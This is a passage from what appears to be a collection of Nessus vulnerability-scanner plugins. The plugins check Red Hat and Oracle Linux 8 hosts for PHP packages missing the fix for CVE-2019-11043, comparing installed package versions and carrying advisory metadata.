preg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 8.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nmodule_ver = get_kb_item('Host/RedHat/appstream/php');\nif (isnull(module_ver)) audit(AUDIT_PACKAGE_NOT_INSTALLED, 'Module php:7.2');\nif ('7.2' >!< module_ver) audit(AUDIT_PACKAGE_NOT_AFFECTED, 'Module php:' + module_ver);\n\nappstreams = {\n 'php:7.2': [\n {'reference':'apcu-panel-5.1.12-2.module+el8.1.0+3202+af5476b9', 'release':'8'},\n {'reference':'libzip-1.5.1-2.module+el8.1.0+3202+af5476b9', 'cpu':'aarch64', 'release':'8'},\n {'reference':'libzip-1.5.1-2.module+el8.1.0+3202+af5476b9', 'cpu':'s390x', 'release':'8'},\n {'reference':'libzip-1.5.1-2.module+el8.1.0+3202+af5476b9', 'cpu':'x86_64', 'release':'8'},\n {'reference':'libzip-debugsource-1.5.1-2.module+el8.1.0+3202+af5476b9', 'cpu':'aarch64', 'release':'8'},\n {'reference':'libzip-debugsource-1.5.1-2.module+el8.1.0+3202+af5476b9', 'cpu':'s390x', 'release':'8'},\n {'reference':'libzip-debugsource-1.5.1-2.module+el8.1.0+3202+af5476b9', 'cpu':'x86_64', 'release':'8'},\n {'reference':'libzip-devel-1.5.1-2.module+el8.1.0+3202+af5476b9', 'cpu':'aarch64', 'release':'8'},\n {'reference':'libzip-devel-1.5.1-2.module+el8.1.0+3202+af5476b9', 'cpu':'s390x', 'release':'8'},\n {'reference':'libzip-devel-1.5.1-2.module+el8.1.0+3202+af5476b9', 'cpu':'x86_64', 'release':'8'},\n {'reference':'libzip-tools-1.5.1-2.module+el8.1.0+3202+af5476b9', 'cpu':'aarch64', 'release':'8'},\n {'reference':'libzip-tools-1.5.1-2.module+el8.1.0+3202+af5476b9', 'cpu':'s390x', 'release':'8'},\n {'reference':'libzip-tools-1.5.1-2.module+el8.1.0+3202+af5476b9', 'cpu':'x86_64', 'release':'8'},\n {'reference':'php-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'aarch64', 'release':'8'},\n {'reference':'php-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'s390x', 'release':'8'},\n {'reference':'php-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'x86_64', 'release':'8'},\n {'reference':'php-bcmath-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'aarch64', 'release':'8'},\n {'reference':'php-bcmath-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'s390x', 'release':'8'},\n {'reference':'php-bcmath-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'x86_64', 'release':'8'},\n {'reference':'php-cli-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'aarch64', 'release':'8'},\n {'reference':'php-cli-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'s390x', 'release':'8'},\n {'reference':'php-cli-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'x86_64', 'release':'8'},\n {'reference':'php-common-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'aarch64', 'release':'8'},\n {'reference':'php-common-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'s390x', 'release':'8'},\n {'reference':'php-common-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'x86_64', 'release':'8'},\n {'reference':'php-dba-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'aarch64', 'release':'8'},\n {'reference':'php-dba-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'s390x', 'release':'8'},\n {'reference':'php-dba-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'x86_64', 'release':'8'},\n {'reference':'php-dbg-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'aarch64', 'release':'8'},\n {'reference':'php-dbg-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'s390x', 'release':'8'},\n {'reference':'php-dbg-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'x86_64', 'release':'8'},\n {'reference':'php-debugsource-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'aarch64', 'release':'8'},\n {'reference':'php-debugsource-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'s390x', 'release':'8'},\n {'reference':'php-debugsource-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'x86_64', 'release':'8'},\n {'reference':'php-devel-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'aarch64', 'release':'8'},\n {'reference':'php-devel-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'s390x', 'release':'8'},\n {'reference':'php-devel-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'x86_64', 'release':'8'},\n {'reference':'php-embedded-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'aarch64', 'release':'8'},\n {'reference':'php-embedded-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'s390x', 'release':'8'},\n {'reference':'php-embedded-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'x86_64', 'release':'8'},\n {'reference':'php-enchant-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'aarch64', 'release':'8'},\n {'reference':'php-enchant-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'s390x', 'release':'8'},\n {'reference':'php-enchant-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'x86_64', 'release':'8'},\n {'reference':'php-fpm-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'aarch64', 'release':'8'},\n {'reference':'php-fpm-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'s390x', 'release':'8'},\n {'reference':'php-fpm-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'x86_64', 'release':'8'},\n {'reference':'php-gd-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'aarch64', 'release':'8'},\n {'reference':'php-gd-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'s390x', 'release':'8'},\n {'reference':'php-gd-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'x86_64', 'release':'8'},\n {'reference':'php-gmp-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'aarch64', 'release':'8'},\n {'reference':'php-gmp-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'s390x', 'release':'8'},\n {'reference':'php-gmp-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'x86_64', 'release':'8'},\n {'reference':'php-intl-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'aarch64', 'release':'8'},\n {'reference':'php-intl-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'s390x', 'release':'8'},\n {'reference':'php-intl-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'x86_64', 'release':'8'},\n {'reference':'php-json-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'aarch64', 'release':'8'},\n {'reference':'php-json-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'s390x', 'release':'8'},\n {'reference':'php-json-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'x86_64', 'release':'8'},\n {'reference':'php-ldap-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'aarch64', 'release':'8'},\n {'reference':'php-ldap-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'s390x', 'release':'8'},\n {'reference':'php-ldap-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'x86_64', 'release':'8'},\n {'reference':'php-mbstring-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'aarch64', 'release':'8'},\n {'reference':'php-mbstring-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'s390x', 'release':'8'},\n {'reference':'php-mbstring-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'x86_64', 'release':'8'},\n {'reference':'php-mysqlnd-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'aarch64', 'release':'8'},\n {'reference':'php-mysqlnd-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'s390x', 'release':'8'},\n {'reference':'php-mysqlnd-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'x86_64', 'release':'8'},\n {'reference':'php-odbc-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'aarch64', 'release':'8'},\n {'reference':'php-odbc-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'s390x', 'release':'8'},\n {'reference':'php-odbc-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'x86_64', 'release':'8'},\n {'reference':'php-opcache-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'aarch64', 'release':'8'},\n {'reference':'php-opcache-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'s390x', 'release':'8'},\n {'reference':'php-opcache-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'x86_64', 'release':'8'},\n {'reference':'php-pdo-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'aarch64', 'release':'8'},\n {'reference':'php-pdo-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'s390x', 'release':'8'},\n {'reference':'php-pdo-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'x86_64', 'release':'8'},\n {'reference':'php-pear-1.10.5-9.module+el8.1.0+3202+af5476b9', 'release':'8', 'epoch':'1'},\n {'reference':'php-pecl-apcu-5.1.12-2.module+el8.1.0+3202+af5476b9', 'cpu':'aarch64', 'release':'8'},\n {'reference':'php-pecl-apcu-5.1.12-2.module+el8.1.0+3202+af5476b9', 'cpu':'s390x', 'release':'8'},\n {'reference':'php-pecl-apcu-5.1.12-2.module+el8.1.0+3202+af5476b9', 'cpu':'x86_64', 'release':'8'},\n {'reference':'php-pecl-apcu-debugsource-5.1.12-2.module+el8.1.0+3202+af5476b9', 'cpu':'aarch64', 'release':'8'},\n {'reference':'php-pecl-apcu-debugsource-5.1.12-2.module+el8.1.0+3202+af5476b9', 'cpu':'s390x', 'release':'8'},\n {'reference':'php-pecl-apcu-debugsource-5.1.12-2.module+el8.1.0+3202+af5476b9', 'cpu':'x86_64', 'release':'8'},\n {'reference':'php-pecl-apcu-devel-5.1.12-2.module+el8.1.0+3202+af5476b9', 'cpu':'aarch64', 'release':'8'},\n {'reference':'php-pecl-apcu-devel-5.1.12-2.module+el8.1.0+3202+af5476b9', 'cpu':'s390x', 'release':'8'},\n {'reference':'php-pecl-apcu-devel-5.1.12-2.module+el8.1.0+3202+af5476b9', 'cpu':'x86_64', 'release':'8'},\n {'reference':'php-pecl-zip-1.15.3-1.module+el8.1.0+3186+20164e6f', 'cpu':'aarch64', 'release':'8'},\n {'reference':'php-pecl-zip-1.15.3-1.module+el8.1.0+3186+20164e6f', 'cpu':'s390x', 'release':'8'},\n {'reference':'php-pecl-zip-1.15.3-1.module+el8.1.0+3186+20164e6f', 'cpu':'x86_64', 'release':'8'},\n {'reference':'php-pecl-zip-debugsource-1.15.3-1.module+el8.1.0+3186+20164e6f', 'cpu':'aarch64', 'release':'8'},\n {'reference':'php-pecl-zip-debugsource-1.15.3-1.module+el8.1.0+3186+20164e6f', 'cpu':'s390x', 'release':'8'},\n {'reference':'php-pecl-zip-debugsource-1.15.3-1.module+el8.1.0+3186+20164e6f', 'cpu':'x86_64', 'release':'8'},\n {'reference':'php-pgsql-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'aarch64', 'release':'8'},\n {'reference':'php-pgsql-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'s390x', 'release':'8'},\n {'reference':'php-pgsql-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'x86_64', 'release':'8'},\n {'reference':'php-process-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'aarch64', 'release':'8'},\n {'reference':'php-process-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'s390x', 'release':'8'},\n {'reference':'php-process-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'x86_64', 'release':'8'},\n {'reference':'php-recode-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'aarch64', 'release':'8'},\n {'reference':'php-recode-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'s390x', 'release':'8'},\n {'reference':'php-recode-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'x86_64', 'release':'8'},\n {'reference':'php-snmp-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'aarch64', 'release':'8'},\n {'reference':'php-snmp-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'s390x', 'release':'8'},\n {'reference':'php-snmp-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'x86_64', 'release':'8'},\n {'reference':'php-soap-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'aarch64', 'release':'8'},\n {'reference':'php-soap-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'s390x', 'release':'8'},\n {'reference':'php-soap-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'x86_64', 'release':'8'},\n {'reference':'php-xml-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'aarch64', 'release':'8'},\n {'reference':'php-xml-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'s390x', 'release':'8'},\n {'reference':'php-xml-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'x86_64', 'release':'8'},\n {'reference':'php-xmlrpc-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'aarch64', 'release':'8'},\n {'reference':'php-xmlrpc-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'s390x', 'release':'8'},\n {'reference':'php-xmlrpc-7.2.11-4.module+el8.1.0+4555+f5cb8e18', 'cpu':'x86_64', 'release':'8'}\n ],\n};\n\nflag = 0;\nappstreams_found = 0;\nforeach module (keys(appstreams)) {\n appstream = NULL;\n appstream_name = NULL;\n appstream_version = NULL;\n appstream_split = split(module, sep:':', keep:FALSE);\n if (!empty_or_null(appstream_split)) {\n appstream_name = appstream_split[0];\n appstream_version = appstream_split[1];\n if (!empty_or_null(appstream_name)) appstream = get_one_kb_item('Host/RedHat/appstream/' + appstream_name);\n }\n if (!empty_or_null(appstream) && appstream_version == appstream || appstream_name == 'all') {\n appstreams_found++;\n foreach package_array ( appstreams[module] ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n }\n }\n}\n\nif (!appstreams_found) audit(AUDIT_PACKAGE_NOT_INSTALLED, 'Module php:7.2');\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'apcu-panel / libzip / libzip-debugsource / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:32:22", "description": "From Red Hat Security Advisory 2019:3736 :\n\nAn update for the php:7.3 module is now available for Red Hat Enterprise Linux 8.\n\nRed Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nPHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server.\n\nSecurity Fix(es) :\n\n* php: underflow in env_path_info in fpm_main.c (CVE-2019-11043)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {}, "published": "2019-11-25T00:00:00", "type": "nessus", "title": "Oracle Linux 8 : php:7.3 (ELSA-2019-3736)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11043"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:php", "p-cpe:/a:oracle:linux:php-bcmath", "p-cpe:/a:oracle:linux:php-cli", "p-cpe:/a:oracle:linux:php-common", "p-cpe:/a:oracle:linux:php-dba", "p-cpe:/a:oracle:linux:php-dbg", "p-cpe:/a:oracle:linux:php-devel", "p-cpe:/a:oracle:linux:php-embedded", "p-cpe:/a:oracle:linux:php-enchant", "p-cpe:/a:oracle:linux:php-fpm", "p-cpe:/a:oracle:linux:php-gd", "p-cpe:/a:oracle:linux:php-gmp", "p-cpe:/a:oracle:linux:php-intl", "p-cpe:/a:oracle:linux:php-json", "p-cpe:/a:oracle:linux:php-ldap", "p-cpe:/a:oracle:linux:php-mbstring", "p-cpe:/a:oracle:linux:php-mysqlnd", "p-cpe:/a:oracle:linux:php-odbc", "p-cpe:/a:oracle:linux:php-opcache", "p-cpe:/a:oracle:linux:php-pdo", "p-cpe:/a:oracle:linux:php-pgsql", "p-cpe:/a:oracle:linux:php-process", "p-cpe:/a:oracle:linux:php-recode", "p-cpe:/a:oracle:linux:php-snmp", "p-cpe:/a:oracle:linux:php-soap", "p-cpe:/a:oracle:linux:php-xml", "p-cpe:/a:oracle:linux:php-xmlrpc", "cpe:/o:oracle:linux:8"], "id": "ORACLELINUX_ELSA-2019-3736.NASL", "href": "https://www.tenable.com/plugins/nessus/131271", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2019:3736 and \n# Oracle Linux Security Advisory ELSA-2019-3736 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131271);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2019-11043\");\n script_xref(name:\"RHSA\", value:\"2019:3736\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0695\");\n\n script_name(english:\"Oracle Linux 8 : php:7.3 (ELSA-2019-3736)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"From Red Hat Security Advisory 2019:3736 :\n\nAn update for the php:7.3 module is now available for Red Hat\nEnterprise Linux 8.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Critical. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Server.\n\nSecurity Fix(es) :\n\n* php: underflow in env_path_info in fpm_main.c (CVE-2019-11043)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2019-November/009384.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected php:7.3 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11043\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP-FPM Underflow RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-mysqlnd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-opcache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:8\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 8\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_exists(release:\"EL8\", rpm:\"php-7.3\") && rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-7.3.5-5.module+el8.1.0+5441+020cccf5\")) flag++;\nif (rpm_exists(release:\"EL8\", rpm:\"php-bcmath-7.3\") && rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-bcmath-7.3.5-5.module+el8.1.0+5441+020cccf5\")) flag++;\nif (rpm_exists(release:\"EL8\", rpm:\"php-cli-7.3\") && rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-cli-7.3.5-5.module+el8.1.0+5441+020cccf5\")) flag++;\nif (rpm_exists(release:\"EL8\", rpm:\"php-common-7.3\") && rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-common-7.3.5-5.module+el8.1.0+5441+020cccf5\")) flag++;\nif (rpm_exists(release:\"EL8\", rpm:\"php-dba-7.3\") && rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-dba-7.3.5-5.module+el8.1.0+5441+020cccf5\")) flag++;\nif (rpm_exists(release:\"EL8\", rpm:\"php-dbg-7.3\") && rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-dbg-7.3.5-5.module+el8.1.0+5441+020cccf5\")) flag++;\nif (rpm_exists(release:\"EL8\", rpm:\"php-devel-7.3\") && rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-devel-7.3.5-5.module+el8.1.0+5441+020cccf5\")) flag++;\nif (rpm_exists(release:\"EL8\", rpm:\"php-embedded-7.3\") && rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-embedded-7.3.5-5.module+el8.1.0+5441+020cccf5\")) flag++;\nif (rpm_exists(release:\"EL8\", rpm:\"php-enchant-7.3\") && rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-enchant-7.3.5-5.module+el8.1.0+5441+020cccf5\")) flag++;\nif (rpm_exists(release:\"EL8\", rpm:\"php-fpm-7.3\") && rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-fpm-7.3.5-5.module+el8.1.0+5441+020cccf5\")) flag++;\nif (rpm_exists(release:\"EL8\", rpm:\"php-gd-7.3\") && rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-gd-7.3.5-5.module+el8.1.0+5441+020cccf5\")) flag++;\nif (rpm_exists(release:\"EL8\", rpm:\"php-gmp-7.3\") && rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-gmp-7.3.5-5.module+el8.1.0+5441+020cccf5\")) flag++;\nif (rpm_exists(release:\"EL8\", rpm:\"php-intl-7.3\") && rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-intl-7.3.5-5.module+el8.1.0+5441+020cccf5\")) flag++;\nif (rpm_exists(release:\"EL8\", rpm:\"php-json-7.3\") && rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-json-7.3.5-5.module+el8.1.0+5441+020cccf5\")) flag++;\nif (rpm_exists(release:\"EL8\", rpm:\"php-ldap-7.3\") && rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"php-ldap-7.3.5-5.module+el8.1.0+5441+020cccf5\")) flag++;\nif (rpm_exists(release:\"EL8\", rpm:\"php-mbstring-7.3\") && rpm_check(release:\"EL8\", cpu:\"x86_64\", 